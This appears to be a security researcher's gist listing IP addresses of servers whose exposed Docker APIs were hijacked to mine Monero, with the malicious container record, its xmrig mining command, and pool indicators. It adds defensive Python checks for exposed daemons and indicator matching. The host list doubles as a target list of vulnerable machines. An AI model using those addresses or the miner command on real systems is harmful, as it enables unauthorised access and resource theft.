@random-robbie
Last active April 27, 2019 17:11
Hijacked XMR Docker Servers

Hijacked Systems

All of the following IPs have the Docker API exposed and have been hijacked to mine XMR.

101.132.125.134
101.251.243.178
101.255.124.125
101.89.134.211
110.87.27.14
114.116.95.37
117.68.155.0
118.24.67.166
119.123.179.148
119.28.84.69
119.29.25.238
120.55.60.63
120.78.161.231
122.112.211.221
122.130.156.202
122.130.162.88
130.61.37.213
13.126.251.47
13.127.225.86
132.232.136.141
132.232.89.207
138.197.178.7
142.44.136.43
142.93.58.171
159.89.214.243
18.191.227.117
18.216.162.54
18.219.135.89
182.61.18.126
193.112.82.34
198.181.44.229
206.189.172.84
34.219.234.223
34.241.123.235
34.241.26.75
34.243.229.106
35.196.240.112
36.111.35.106
37.123.179.67
40.113.227.30
40.85.221.142
45.115.236.2
45.79.90.143
46.238.43.38
49.4.88.169
52.221.217.38
52.221.254.168
52.55.245.50
52.66.50.254
52.76.241.217
52.83.226.113
52.83.231.122
52.83.255.247
52.87.113.76
54.145.128.254
54.175.91.189
54.183.234.49
54.191.252.227
54.200.143.122
54.202.26.218
54.223.241.195
54.66.165.97
66.226.76.221
68.168.131.140
81.226.150.217
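
The exposed daemon API is what made every host on the list reachable in the first place. As an added example (not part of the gist), here is a small Python check that reads a Docker daemon.json body, plus any -H/--host flags a systemd unit might pass to dockerd, and flags Engine API listeners reachable over TCP without TLS client authentication (tlsverify). Both configurations below are constructed samples; the certificate paths under /etc/docker are placeholders.

```python
"""Check a Docker daemon configuration for an Engine API listener reachable without TLS client auth."""
import json
import shlex
from urllib.parse import urlsplit

# Constructed sample of a weak /etc/docker/daemon.json: the API listens on every interface, no TLS.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Constructed sample of a corrected daemon.json: mutual TLS required (tlsverify) on the TLS port.
# Certificate paths are placeholders.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""


def listeners_from_flags(dockerd_args):
    """Collect -H / --host values from a dockerd command line and whether --tlsverify is set."""
    argv = shlex.split(dockerd_args)
    hosts = []
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host=") or arg.startswith("-H="):
            hosts.append(arg.split("=", 1)[1])
    return hosts, ("--tlsverify" in argv or "--tlsverify=true" in argv)


def assess_daemon_config(daemon_json_text, dockerd_args=""):
    """Return (severity, message) findings for a daemon.json body plus optional dockerd flags.

    HIGH: a tcp:// listener with no tlsverify, so anyone who can reach the port controls the daemon.
    INFO: TLS-protected but bound to all interfaces; still worth restricting with a firewall.
    """
    cfg = json.loads(daemon_json_text)
    hosts = list(cfg.get("hosts", []))
    flag_hosts, flag_tlsverify = listeners_from_flags(dockerd_args)
    hosts += flag_hosts
    tls_auth = bool(cfg.get("tlsverify")) or flag_tlsverify

    findings = []
    for host in hosts:
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local; file permissions govern them
        addr = urlsplit(host).hostname
        if not tls_auth:
            findings.append(("HIGH", f"Engine API listener {host} without TLS client authentication"))
        elif addr in ("0.0.0.0", "::"):
            findings.append(("INFO", f"TLS-protected Engine API listener {host} bound to all interfaces"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, assess_daemon_config(text))
    # A listener added on the command line rather than in daemon.json is caught too.
    print("flags", assess_daemon_config("{}", "dockerd -H fd:// -H tcp://0.0.0.0:2375"))
```

The check deliberately treats unix:// and fd:// sockets as out of scope: they are protected by filesystem permissions, whereas a tcp:// listener without tlsverify is effectively root for anyone who can reach the port.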

Docker Image

All appear to have the following image and command line.

{
    "Status": "Up 20 hours",
    "Created": 1536506330,
    "Image": "tmpdocker/xmr",
    "Labels": {},
    "NetworkSettings": {
        "Networks": {
            "bridge": {
                "NetworkID": "REDACTED",
                "MacAddress": "REDACTED",
                "GlobalIPv6PrefixLen": 0,
                "Links": null,
                "GlobalIPv6Address": "",
                "IPv6Gateway": "",
                "DriverOpts": null,
                "IPAMConfig": null,
                "EndpointID": "REDACTED",
                "IPPrefixLen": 16,
                "IPAddress": "172.17.0.3",
                "Gateway": "172.17.0.1",
                "Aliases": null
            }
        }
    },
    "HostConfig": {
        "NetworkMode": "default"
    },
    "ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e",
    "State": "running",
    "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k",
    "Names": [
        "/clever_lovelace"
    ],
    "Mounts": [],
    "Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792",
    "Ports": []
}

Miner Pool Details

All appear to use the same ProtonMail email address as the miner pool login.

tmp456789@protonmail.com connecting to stratum+tcp://xmr.pool.minergate.com:45700
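
The image, image ID, xmrig command line, pool host and pool login above are all usable as indicators. As an added example (not part of the gist), the Python below turns them into a check over a container listing in the shape the Engine API returns from /containers/json, which is also the shape of the record shown above. The listing it runs on is constructed: the gist's container, trimmed to the fields the check reads, plus a benign nginx container for contrast. It also generalises slightly beyond the page: any stratum:// pool URL in a container command is reported even when the host is not the one named here.

```python
"""Match a Docker Engine API container listing (/containers/json shape) against the gist's miner indicators."""
import json
import shlex
from urllib.parse import urlsplit

# Indicators copied from the gist's container record.
IOC_IMAGES = {"tmpdocker/xmr"}
IOC_IMAGE_IDS = {"sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e"}
IOC_POOL_HOSTS = {"xmr.pool.minergate.com"}
IOC_POOL_USERS = {"tmp456789@protonmail.com"}

# Constructed listing: the gist's container (only the fields the check reads) plus a
# constructed benign web container for contrast.
SAMPLE_LISTING = json.dumps([
    {
        "Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792",
        "Names": ["/clever_lovelace"],
        "Image": "tmpdocker/xmr",
        "ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e",
        "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k",
        "State": "running",
    },
    {
        "Id": "0" * 64,                 # constructed placeholder id
        "Names": ["/web"],
        "Image": "nginx:1.15",          # constructed benign container
        "ImageID": "sha256:" + "0" * 64,
        "Command": "nginx -g 'daemon off;'",
        "State": "running",
    },
])

# xmrig accepts both short and long forms for the pool URL and the login.
FLAG_TO_FIELD = {"-o": "pool", "--url": "pool", "-u": "user", "--user": "user"}


def parse_miner_args(command):
    """Extract the pool (-o/--url) and login (-u/--user) from an xmrig-style command line."""
    try:
        argv = shlex.split(command)
    except ValueError:                  # unbalanced quotes; fall back to a plain split
        argv = command.split()
    opts = {}
    for i, arg in enumerate(argv):
        if arg in FLAG_TO_FIELD and i + 1 < len(argv):
            opts[FLAG_TO_FIELD[arg]] = argv[i + 1]
        elif "=" in arg and arg.split("=", 1)[0] in FLAG_TO_FIELD:
            flag, value = arg.split("=", 1)
            opts[FLAG_TO_FIELD[flag]] = value
    return opts


def scan_containers(listing_json):
    """Return one finding per container that matches any indicator, naming which ones hit."""
    findings = []
    for c in json.loads(listing_json):
        command = c.get("Command", "")
        hits = []
        if c.get("Image") in IOC_IMAGES:
            hits.append("image")
        if c.get("ImageID") in IOC_IMAGE_IDS:
            hits.append("image_id")
        binary = command.split(" ", 1)[0].rsplit("/", 1)[-1]   # "./xmrig" -> "xmrig"
        if binary == "xmrig":
            hits.append("xmrig_binary")
        args = parse_miner_args(command)
        pool = args.get("pool")
        if pool:
            if urlsplit(pool).hostname in IOC_POOL_HOSTS:
                hits.append("pool_host")
            elif pool.startswith("stratum"):
                hits.append("stratum_url")  # unknown pool, but still a miner talking stratum
        if args.get("user") in IOC_POOL_USERS:
            hits.append("pool_user")
        if hits:
            findings.append({
                "id": c.get("Id", "")[:12],
                "name": (c.get("Names") or [""])[0],
                "indicators": hits,
                "pool": pool,
                "user": args.get("user"),
            })
    return findings


if __name__ == "__main__":
    # Live use would fetch the listing from the local daemon's unix socket and pass the body here.
    for finding in scan_containers(SAMPLE_LISTING):
        print(json.dumps(finding))
```

Matching on the image name alone would miss a retagged image, and matching on the pool host alone would miss a miner pointed at a different pool, which is why the check reports every indicator that hits and treats any stratum URL as worth a look.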